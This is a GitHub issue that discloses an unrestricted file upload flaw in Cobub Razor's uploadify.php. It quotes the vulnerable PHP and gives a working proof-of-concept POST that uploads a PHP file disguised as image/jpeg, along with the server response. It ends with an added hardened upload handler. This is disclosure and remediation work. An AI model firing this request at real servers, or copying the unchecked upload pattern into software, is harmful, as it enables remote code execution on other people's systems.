cobub / razor

Cobub Razor - Open Source Mobile Analytics Solution
http://www.cobub.com

Vulnerability: Cobub Razor file upload #168

Open kyrie403 opened 5 years ago

kyrie403 commented 5 years ago

Vulnerability: Cobub Razor file upload

Detail:

/web/assets/swf/uploadify.php, line 26: checks whether $_FILES is empty -> builds the target path from the document root + the `folder` parameter + the uploaded file name -> moves the file there. The file type is not restricted.

    if (!empty($_FILES)) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        // Target directory comes straight from the request: the client picks
        // where under DOCUMENT_ROOT the file lands.
        $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
        // File name is also client-supplied, extension included.
        $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

        // The extension allow-list that shipped with uploadify is commented out,
        // so no check runs before the file is written.
        // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
        // $fileTypes  = str_replace(';','|',$fileTypes);
        // $typesArray = split('\|',$fileTypes);
        // $fileParts  = pathinfo($_FILES['Filedata']['name']);

        // if (in_array($fileParts['extension'],$typesArray)) {
            // Uncomment the following line if you want to make the directory if it doesn't exist
            // mkdir(str_replace('//','/',$targetPath), 0755, true);

            move_uploaded_file($tempFile,$targetFile);
            // Echoes the absolute server path of the stored file back to the client.
            echo $targetFile;
    }

POC:

Construct an upload POST:

    POST /razor/web/assets/swf/uploadify.php?folder=/razor/web/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------18467633426500
    Content-Length: 213
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------18467633426500
    Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
    Content-Type: image/jpeg

    <?php phpinfo();?>
    -----------------------------18467633426500--

Upload success:

    HTTP/1.1 200 OK
    Date: Fri, 29 Mar 2019 04:33:23 GMT
    Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
    X-Powered-By: PHP/5.6.27
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 57

    D:/***/***/WWW/razor/web/phpinfo.php

[screenshot: result]
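For comparison, the following is an added example of a hardened replacement for the upload handler; it is not code from the Cobub Razor project or from the reporter. It assumes a fixed upload directory (`UPLOAD_DIR`, chosen here as a path that the web server does not serve), a short image extension allow-list, and that the caller has already been authenticated elsewhere; all of those names and values are assumptions. The `folder` request parameter used by the original is dropped entirely, so the client controls neither the directory nor the file name.

```php
<?php
// Added example, not Cobub Razor code: hardened stand-in for
// web/assets/swf/uploadify.php. Assumptions: UPLOAD_DIR exists, is writable
// by the PHP process and is not served by the web server.
declare(strict_types=1);

const UPLOAD_DIR  = '/var/www/razor-uploads';        // assumption
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];   // assumption
const MAX_BYTES   = 2 * 1024 * 1024;                 // assumption

/**
 * Validate one entry of $_FILES and store it under a server-generated name.
 * Returns the stored file name; throws RuntimeException on any rejection.
 */
function handleUpload(array $file, string $uploadDir): string
{
    if (!isset($file['error']) || is_array($file['error'])) {
        throw new RuntimeException('Invalid upload parameters');
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Only accept the temp file PHP itself created for this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    // Extension allow-list on the client-supplied name (lower-cased, strict compare).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('File type not permitted');
    }
    // Inspect the bytes, not the Content-Type the client sent: the PoC above
    // labels a PHP script as image/jpeg, so $_FILES['type'] proves nothing.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
        throw new RuntimeException('Content does not look like an image');
    }
    // Server-generated name; the request never influences the path.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store file');
    }
    return $name;
}

if (empty($_FILES['Filedata'])) {
    http_response_code(400);
    exit('No file');
}
try {
    // Return only the generated name, never the absolute server path.
    echo handleUpload($_FILES['Filedata'], UPLOAD_DIR);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'Upload rejected';
}
```

Three things change relative to the original: the destination is fixed in code rather than taken from `$_REQUEST['folder']`, the name written to disk is random and carries only an allow-listed extension, and the response no longer echoes the absolute path. If the upload directory must be web-served, disable script execution there as well (for Apache, `php_flag engine off` or `RemoveHandler .php` in that directory's configuration) so that a validation gap does not immediately become code execution.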